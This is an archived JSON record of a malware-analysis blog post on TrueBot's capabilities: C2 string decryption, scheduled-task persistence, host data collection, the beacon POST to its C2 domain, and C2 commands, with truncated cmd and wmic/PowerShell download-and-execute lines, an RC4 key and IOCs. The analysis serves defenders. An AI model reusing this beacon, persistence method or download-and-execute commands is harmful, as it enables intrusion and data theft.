{
	"id": "03d9f03e-2373-4037-b7bb-e616f284fead",
	"created_at": "2026-04-06T00:12:31.535071Z",
	"updated_at": "2026-04-10T13:12:57.292446Z",
	"deleted_at": null,
	"sha1_hash": "f5ac5b24528d0aa81d5457fc7fe07c49de144ee1",
	"title": "TrueBot Analysis Part III - Capabilities",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10770934,
	"plain_text": "TrueBot Analysis Part III - Capabilities\r\nBy Robert Giczewski\r\nPublished: 2023-03-31 · Archived: 2026-04-05 20:56:19 UTC\r\nAfter we have dealt with TrueBot’s packer in Part I and Part II, we can now finally analyze its core and see if we\r\nfind something useful to extract in the next part.\r\nEvery unpacked sample I’ve seen so far looks pretty much identical. In this case, we’ll analyze\r\nc042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c.\r\nAt the beginning there is a lot of stuff going on that I haven’t analyzed and probably never will because it seems\r\nlike it’s just garbage. The interesting part starts further down (marked red in the figure below):\r\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 1 of 11\n\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 2 of 11\n\nFortunately, TrueBot’s code is pretty well readable. There are no encrypted strings except the C2. API calls are\r\nproperly imported and referenced and there is no anti-analysis/debug functionality.\r\nGet the C2\r\nRight at the start of the interesting code block, we can see three strings which look suspicious. Two of them are\r\nobviously Base64 encoded strings and are passed as arguments to the b64_decode() function, the other is passed\r\nas an argument to a function that turns out to be a RC4 decryption function.\r\nBefore decrypting the Base64 decoded string, the string is passed to a URL Decode function for whatever reason.\r\nWhen decoding the Base64 strings we get the following results:\r\necho \"OSVlZSVmMCU4ZU9ZJTk3RC0lYjYlMGQlYWYlMDVYLg==\" | base64 -D\r\n9%ee%f0%8eOY%97D-%b6%0d%af%05X.\r\necho \"ZyVmZSVmNCU5YlklMDMlOTVNOQ==\" | base64 -D\r\ng%fe%f4%9bY%03%95M9\r\nAfter putting the Base64 decoded string into the url_decode function, we get the decoded bytes for the\r\nencrypted C2.\r\n9%ee%f0%8eOY%97D-%b6%0d%af%05X. =\u003e 39 EE F0 8E 4F 59 97 44 2D B6 0D AF 05 58 2E\r\ng%fe%f4%9bY%03%95M9 =\u003e 67 fe f4 9b 59 03 95 4d 39\r\nIn the next steps, TrueBot is RC4 decrypting both of the earlier decoded bytes.\r\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 3 of 11\n\n39 EE F0 8E 4F 59 97 44 2D B6 0D AF 05 58 2E =\u003e qweastradoc.com\r\n67 fe f4 9b 59 03 95 4d 39 =\u003e /gate.php\r\nPersistence\r\nBefore persisting itself, TrueBot creates a Mutex ( IFjwi312fu321321rfewfew ) to check if another instance of\r\nitself is running, if so, it will terminate via ExitProcess(0) .\r\nRight after creating the mutex, TrueBot tries to persist itself by creating a scheduled task via a COM Interface.\r\nTrueBot supports both the Task Scheduler 1.0 and 2.0 API and therefore uses the respective different CLSIDs.\r\nTask Scheduler 1.0 API - Pre-Vista: 148BD52A-A2AB-11CE-B11F-00AA00530503\r\nTask Scheduler 2.0 API - Vista and higher: 0F87369F-A4E5-4CFC-BD3E-73E6154572DD\r\nThe scheduled task is set up to run after each login and is configured to execute TrueBot via rundll32.exe .\r\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 4 of 11\n\nC2 Communication\r\nRight after persisting itself, TrueBot gathers information from the infected system which will be sent to the C2. To\r\nget rid of “unwanted” processes, TrueBot filters those against a hardcoded list of keywords.\r\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 5 of 11\n\nAll other collected process names are then concatenated with | as a delimiter and stored into a buffer.\r\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 6 of 11\n\nAfter collecting the processes, TrueBot searches for the existence of files with the file extension .JSONIP . If\r\nthere is no such file, it will be created with a random 13 character alphabetical name for example\r\nC:\\ProgramData\\QdJLLvdcYfqmK.JSONIP . TrueBot will then create a new GUID with the following formula:\r\nwsprintfA(buffer, \"%08x-%08x\", pguid.Data3 + pguid.Data1 * pguid.Data2, pguid.Data1 * pguid.Data2\r\nand write it into the newly created file. The GUID and the previously collected processes are combined into a\r\nstring, which is then URL encoded. The result before the URL encoding looks like this:\r\nThe URL encoded data is then encoded with Base64 and sent to the C2 on port 80 with a self crafted HTTP\r\nRequest:\r\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 7 of 11\n\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 8 of 11\n\nAfter sending the initial data to the C2, TrueBot performs some kind of connectivity check by trying to connect to\r\ngoogle.com . If it fails, it will try again after one second unless it is successful.\r\nWhen successful, TrueBot is trying to get the victims DNS domain and the hostname by calling\r\nGetComputerNameExA() twice.\r\nIn the last step before sending data to the C2, TrueBot tries to identify the operating system version via\r\nGetVersionExA() and depending on the VersionInformation , it just returns a number which is then used as an\r\nindex for a hardcoded OS Version array:\r\nFinally, TrueBot constructs the data string which will be sent to the C2:\r\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 9 of 11\n\nLike the collected processes earlier, the string will be URL and Base64 encoded and send to the C2 with the\r\nfollowing post request:\r\nPOST /gate.php HTTP/1.0\\r\\n\r\nHost: qweastradoc.com\\r\\n\r\nContent-type: application/x-www-form-urlencoded\\r\\n\r\nContent-length: 116\\r\\n\r\n\\r\\n\r\nbiUzZGQ2MDQzYmYyLWQ2MDNhMjlhJTI2byUzZFdJTjEwJTI2YSUzZDY0JTI2dSUzZFdPUktHUk9VUCUyNnAlM2RERVNLVE9QLT\r\nAfter sending the POST request, TrueBot is expecting one of the following commands from the C2:\r\nKLLS\r\nPS1\r\nSHC\r\nS64\r\nThe commands PS1 , SHC and S64 will only be executed if there is a “http” string in front of them, for\r\nexample:\r\nhttp|PS1\r\nI’m not sure if this is intended by the author and how the real response from the C2 looks like but at least during\r\ndebugging, this seems to work, see the following image:\r\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 10 of 11\n\nKLLS: Terminates itself via cmd.exe for example C:\\WINDOWS\\system32\\cmd.exe /c del C:\\Users\\user\\\r\nPS1: Download and execute a Powershell script via wmic.exe e.g. wmic.exe process call create \"pow\r\nSHC: Download and execute Shellcode\r\nS64: Download and execute Shellcode with higher privileges (if possible)\r\nFor the commands PS1 , SHC and S64 , the received Payload from the C2 will first be decrypted with RC4\r\nagain but this time with another RC4 key, in this case OfgjkwsikhU23 .\r\nIn the next blogpost, we’ll do some more coding again and write a config extractor that extracts the most\r\nimportant artifacts from the binary. Stay tuned.\r\nIOCs:\r\nc042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c\r\nqweastradoc[.]com\r\nSource: https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nhttps://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html"
	],
	"report_names": [
		"analyzing-truebot-capabilities.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434351,
	"ts_updated_at": 1775826777,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f5ac5b24528d0aa81d5457fc7fe07c49de144ee1.pdf",
		"text": "https://archive.orkl.eu/f5ac5b24528d0aa81d5457fc7fe07c49de144ee1.txt",
		"img": "https://archive.orkl.eu/f5ac5b24528d0aa81d5457fc7fe07c49de144ee1.jpg"
	}
}